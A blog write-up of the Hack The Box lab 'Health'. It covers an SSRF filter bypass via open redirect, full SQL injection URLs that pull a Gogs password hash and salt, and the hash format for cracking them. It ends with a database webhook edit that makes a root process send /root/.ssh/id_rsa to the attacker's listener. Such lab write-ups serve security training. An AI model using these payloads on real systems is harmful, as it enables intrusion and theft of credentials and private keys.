emacab98

Health - HTB - Key Points

November 18, 2022722 words

Target's IP: 10.10.11.176

Hostname: health.htb

The functionality of the website calls for SSRF, and it is, indeed, the case. We can bypass the filter on the website using an open redirect, as shown on Hacktricks.

Redirecting to the filtered port on 3000, we get the source code of a Gogs page. Checking for Gogs on the internet, there is a known SQLinjection vulnerability we can exploit:

python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/**/select/**/1,'1',(select/**/passwd/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"

Which gives us a very long hex string, 66c...37, and also:

python2 redirect.py --port 80 --ip 10.10.14.40 "http://10.10.11.176:3000/api/v1/users/search?q=e')/**/union/**/all/**/select/**/1,'1',(select/**/salt/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"

which gives us the salt for the hashing algorithm

Looking up on the internet, Gogs seems to be using PBKDF2 with SHA256, defaulting to 10000 rounds, so we need to construct the hash in the proper format for hashcat to crack it. The format is:

sha256:10000:base64(salt):base64(fromhex(password))

Cracking the password, we can log into ssh as susanne:

susanne@health:~$ cat user.txt
d5...7e

Monitoring for background processes, one stands out:

CMD: UID=0    PID=5851   | /bin/bash -c cd /var/www/html && php artisan schedule:run >> /dev/null 2>&1

It's the process that runs the scheduled webhooks from the web application

Enumerating the box a little further, we can retrieve the credentials for the DB in /var/www/html/.env 


DB_CONNECTION=mysql                                                                                                                                          
DB_HOST=127.0.0.1                                                                                                                                            
DB_PORT=3306                                                                                                                                                 
DB_DATABASE=laravel                                                                                                                                          
DB_USERNAME=laravel                                                                                                                                          
DB_PASSWORD=MYsq...014+

When we create a webhook on the web app, it is stored in the database. But from the DB console we can now modify the monitored URL without any filter in place, so we can read the filesystem as root by changing the entry in the DB like this:

9581a098-b8cf-4a54-9d85-dd243a959fef | http://10.10.14.16:443 |         0 | file:///root/.ssh/id_rsa | * * * * * | 2022-11-17 09:40:07 | 2022-11-17 09:40:07 |


Using the file protocol, as suggested on Hacktricks, allows us to read the flag:
root.txt: 7a9...f5e

Merry hacking ;)

React to this post
👍❤️🫶👏👌🤯🤔😂😍😭😢😡😮

You'll only receive email when they publish something new.

More from emacab98
All posts